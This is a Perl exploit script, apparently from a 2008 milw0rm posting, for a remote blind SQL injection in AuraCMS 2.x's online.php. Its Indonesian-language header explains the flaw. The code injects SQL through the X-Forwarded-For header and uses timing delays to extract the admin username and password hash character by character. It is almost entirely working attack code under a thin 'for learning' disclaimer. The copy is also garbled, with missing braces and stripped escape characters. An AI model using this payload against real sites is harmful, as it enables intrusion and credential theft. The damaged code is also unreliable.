#!/usr/bin/perl -w
# Indonesian Newhack Security Advisory
# ————————————
# AuraCMS 2.x (online.php) – Remote Blind SQL Injection Exploit
# Waktu : Feb 15 2008 01:00PM
# Software : AuraCMS
# Versi : 2.0
# 2.1
# 2.2.1
# Vendor : http://www.auracms.org/
# ————————————
# Audit Oleh : NTOS-Team
# Lokasi : Indonesia | http://newhack.org
# Penjelasan :
# Kutu pada berkas “online.php”
# —//—
# 05. $uipanda=getenv(“HTTP_X_FORWARDED_FOR”); // <- Injeksi!
# 06. $uproxyserver=getenv(“HTTP_VIA”);
# 07. $uipproxy=getenv(“REMOTE_ADDR”);
# 08. $uhost=gethostbyaddr($uipproxy);
# 09. $utime=time();
# 10. $now=$utime-600; // (in seconds)
# –//–
# 12. @mysql_query(“delete from useronline where timevisit<$now”);
# 13. $uexists=@mysql_num_rows(@mysql_query(“select id from useronline where ipproxy=’$uipproxy'”));
# 14. if ($uexists>0){
# 15. @mysql_query(“update useronline set timevisit=’$utime’ where ipproxy=’$uipproxy'”);
# 16. } else {
# 17. @mysql_query(“insert into useronline (ipproxy,host,ipanda,proxyserver,timevisit) values(‘$uipproxy’,’$uhost’,’$uipanda’,’$uproxyserver’,’$utime’)”); // <- Injeksi!
# 18. }
# —//—
# Injeksi dilakukan melalui manipulasi header X-Forwarded-For yang ditumpangi perintah SQL
# referensi mengenai injeksi SQL “INSERT” -> http://www.milw0rm.com/papers/149
# => Perhatian!
# “Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari”
# Segela penyalahgunaan dan kerusakan yang diakibat dari exploit ini bukan tanggung jawab kami
# =>Newhack Technology, OpenSource & Security
# ~ NTOS-Team->[fl3xu5,opt1lc] ~
use IO::Socket;
use strict;
print “n |——————————————————-|”;
print “n | Indonesian Newhack Technology |”;
print “n |——————————————————-|”;
print “n | AuraCMS 2.x (online.php) Remote Blind SQL Injection |”;
print “n | Coded by NTOS-Team |”;
print “n |——————————————————-|”;
print “n[!] “;
print “n[!] Exploit Berhasil jika magic_quotes_gpc = off pada server”;
print “n[!] Penggunaan : perl aura2x-bsqli.pl [Site] [Path] [bencmark_delay]”;
print “n[!] Contoh : perl aura2x-bsqli.pl localhost /auracms2.x/ 2500000”;
print “n[!] “;
print “n”;
my $delay = “2000000”;
my $host = $ARGV[0];
my $dir = $ARGV[1];
if ($ARGV[2]) {
$delay = $ARGV[2];
print “nTarget url : “.$host.$dir.”nn”;
$host =~ s/(http://)//;
my @array = (“user”,”password”);
print “=> Mencoba mencari satu per satu aksara yang tepat – Sabar ya…. ;)nn”;
sub blindsql() {
my $x = “”;
my $i = “”;
my $string = “”;
my $res = “1”;
for ( $x=0; $x<=$#array; $x++ ) {
my $j = 1;
$res = 1;
while ($res) {
for ($i=32;$i<=127;$i++) {
$res = 0;
if ( $x eq 1 ) {
next if ( $i < 48 );
next if ( ( $i > 57 ) and ( $i < 97 ) );
next if ( $i > 102 );
my $injeksi = “$i’ AND IF(ASCII(SUBSTRING((SELECT “.$array[$x].” FROM useraura LIMIT 1),$j,1))=$i,BENCHMARK(“.$delay.”,MD5(‘X’)),0) ,’$i’,’$i’)/*”;
my $mulai = time();
my $req = IO::Socket::INET->new( Proto => “tcp”, PeerAddr => “$host”, PeerPort => “80”) || die “Error – Koneksi Gagalnn”;
print $req “GET “.$dir.”index.php?pilih=stat&mod=yes HTTP/1.1rn”;
print $req “Host: $hostrn”;
print $req “X-Forwarded-For: “.$injeksi.”rn”;
print $req “Keep-Alive: 300rn”;
print $req “Connection: Keep-Alivern”;
print $req “Cache-Control: no-cachern”;
print $req “Connection: closernrn”;
while (my $result = <$req>) {
if ( $result =~ /404 Not Found/ ) {
printf “nnFile not found.nn”;
print “nn$resultnn”;
if ( $result =~ /400 Bad Request/ ) {
printf “nnBad request.nn”;
print “nn$resultnn”;
my $akhir = time();
my $waktuproses = $akhir – $mulai;
if ( $waktuproses > 4 ) {
$string .= chr($i);
print “ntMendapatkan Aksara : “.chr($i).”nn”;
$res = 1;
print “tMencoba Aksara : “.chr($i).”n”;
if ( !$res ) {
$array[$x] = $string;
$string = “”;
print “n———————-n”;
print “Admin username : $array[0]n”;
print “Admin password : $array[1]nn”;
# milw0rm.com [2008-03-14]